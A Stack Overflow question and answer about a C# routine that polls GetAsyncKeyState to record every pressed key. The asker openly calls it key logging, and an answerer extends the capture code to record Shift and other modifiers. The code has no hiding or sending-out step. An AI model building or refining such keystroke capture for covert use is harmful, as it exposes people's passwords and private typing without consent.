# It's possible to replaces chars when Shift key is pressed?

Tags: c#, string, replace

Hello Stack Overflow community!

This is my function that catches every pressed key:

```
public static string GetBuffKeys()
        {
            string buffer = "";
            foreach (System.Int32 i in Enum.GetValues(typeof(Keys)))
            {
                if (GetAsyncKeyState(i) == -32767)
                    buffer += Enum.GetName(typeof(Keys), i);
            }
            return buffer;
        }
```

To have a little formating, I using this function that replaces me characters with new one:

```
public static class KeyControl
    {
        [DllImport("User32.dll")]
        private static extern short GetAsyncKeyState(int vKey);

        public static string ReplaceChars(string text)
        {
            text = text.Replace("Space", " ");
            text = text.Replace("Delete", "<Del>");
            text = text.Replace("LShiftKey", "");
            text = text.Replace("ShiftKey", "");
            text = text.Replace("OemQuotes", "!");
            text = text.Replace("Oemcomma", "?");
            text = text.Replace("D8", "á");
            text = text.Replace("D2", "ě");
            text = text.Replace("D3", "š");
            text = text.Replace("D4", "č");
            text = text.Replace("D5", "ř");
            text = text.Replace("D6", "ž");
            text = text.Replace("D7", "ý");
            text = text.Replace("D9", "í");
            text = text.Replace("D0", "é");
            text = text.Replace("D1", "+");
            text = text.Replace("Back", "<==");
            text = text.Replace("LButton", "");
            text = text.Replace("RButton", "");
            text = text.Replace("NumPad", "");
            text = text.Replace("OemPeriod", ".");
            text = text.Replace("OemSemicolon", ",");
            text = text.Replace("Oem4", "/");
            text = text.Replace("LControlKey", "");
            text = text.Replace("ControlKey", "");
            text = text.Replace("Enter", "<ENT>");
            text = text.Replace("Shift", "");
            text = text.Replace("CapsLock", "");
            text = text.Replace("Oem6", "(");
            return text;
        }
```

But I want replace D* (D1, for example) with number, if Shift key is pressed. It is possible? And if not, what is better method for key logging than buffer all pressed keys? Thanks a lot!

Comment: Is that text from [`System.Windows.Input.KeyEventArgs.Key`](https://msdn.microsoft.com/en-us/library/system.windows.input.keyeventargs.key%28v=vs.110%29.aspx) in [`System.Windows.Input.KeyEventArgs`](https://msdn.microsoft.com/en-us/library/System.Windows.Input.KeyEventArgs%28v=vs.110%29.aspx) (WPF) or from [`System.Windows.Forms.Keys`](https://msdn.microsoft.com/en-us/library/system.windows.forms.keys.aspx) in [`System.Windows.Forms.KeyEventArgs`](https://msdn.microsoft.com/en-us/library/System.Windows.Forms.KeyEventArgs%28v=vs.110%29.aspx) (winforms)?

Comment: @dbc no, I added my function in man thread, check it out.

Comment: You can use [`Keyboard.Modifiers`](https://msdn.microsoft.com/en-us/library/system.windows.input.keyboard.modifiers%28v=vs.110%29.aspx) to see what modifier keys are currently pressed.  Is that what you want?

Comment: Or also [`Control.ModifierKeys`](https://msdn.microsoft.com/en-us/library/system.windows.forms.control.modifierkeys%28v=vs.110%29.aspx).

Comment: @dbc Thanks for second one! I will try it out! :)

Answer (score 0):

You can use [`Control.ModifierKeys`](https://msdn.microsoft.com/en-us/library/system.windows.forms.control.modifierkeys.aspx) (WinForms) or [`Keyboard.Modifiers`](https://msdn.microsoft.com/en-us/library/system.windows.input.keyboard.modifiers.aspx) (WPF) to see what modifier keys are currently pressed.  For instance:

```
        var modifiers = Control.ModifierKeys;
        if (modifiers != Keys.None)
        {
            text = text = "[" + modifiers.ToString() + "]";
        }
```

Note that `Keyboard.Modifiers` are a bitmask field.  Thus the following code clears a specific modifier when they current keypress event corresponds to that modifier:

```
    public static string GetBuffKeys()
    {
        var allModifierKeys = new Dictionary<Keys, Keys> { { Keys.ControlKey, Keys.Control }, {Keys.ShiftKey, Keys.Shift}, {Keys.Menu, Keys.Alt }};
        var modifiers = Control.ModifierKeys;

        string buffer = "";
        foreach (var key in Enum.GetValues(typeof(Keys)).OfType<Keys>().Distinct()) // The enum seems to have duplicated values for Enter and Return.  Uniquify them.
        {
            if (GetAsyncKeyState((int)key) == -32767)
            {
                buffer += ReplaceChars(Enum.GetName(typeof(Keys), key));
                if (allModifierKeys.Keys.Contains(key))
                    modifiers &= ~(allModifierKeys[key]); // Remove this modifier to prevent double printing.
            }
        }
        if (modifiers != Keys.None)
        {
            buffer = buffer + " [" + modifiers.ToString() + "]";
        }
        return buffer;
    }
```

Comment: Thank you, I will now try it out! But I have little question: for key combinations with Shift use Keys.Shift or Keys.ShiftKey ??

Comment: @PepinCZ - the dictionary `allModifierKeys` gives a mapping from modifier key to modifier.

Comment: Man but... I got his result when typing with shift and altgr...:

Comment: `[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] A Z NUMPADU JE TO 13 A NEVIM CO MAM DELAT  [] [] [] [] [] [] []. [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] []( [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] []( [] []( [] []( [] []( [] []( [] []( [] [] []( [] []( [] []( [] []( [] []( [] [] [] []<ENT> [] [] [] [] [] [] [] [] [] [] []`

Comment: I'm not seeing that.  I'll need to see your method `GetAsyncKeyState()` and also how you bind it in to your program to help much further.

Comment: Thats all: `private static extern short GetAsyncKeyState(int vKey);`

Comment: Maybe its bad cause I'm using CZECH keyboard

Comment: @PepinCZ - you must have a DllImport declaration for it somewhere.

Comment: @PepinCZ - OK, so can you update your question to include it please?

Comment: @PepinCZ - there may be a problem with your `ReplaceChars()` method.  For the key `RControlKey` it returns `"R<CTRL>"` which is probably not what you want.  What does your code do if you remove this method?

Comment: @PepinCZ - if you are printing your output to the console, you may need to set its encoding to Utf8.  See [c# unicode string output](http://stackoverflow.com/questions/5055659/c-sharp-unicode-string-output).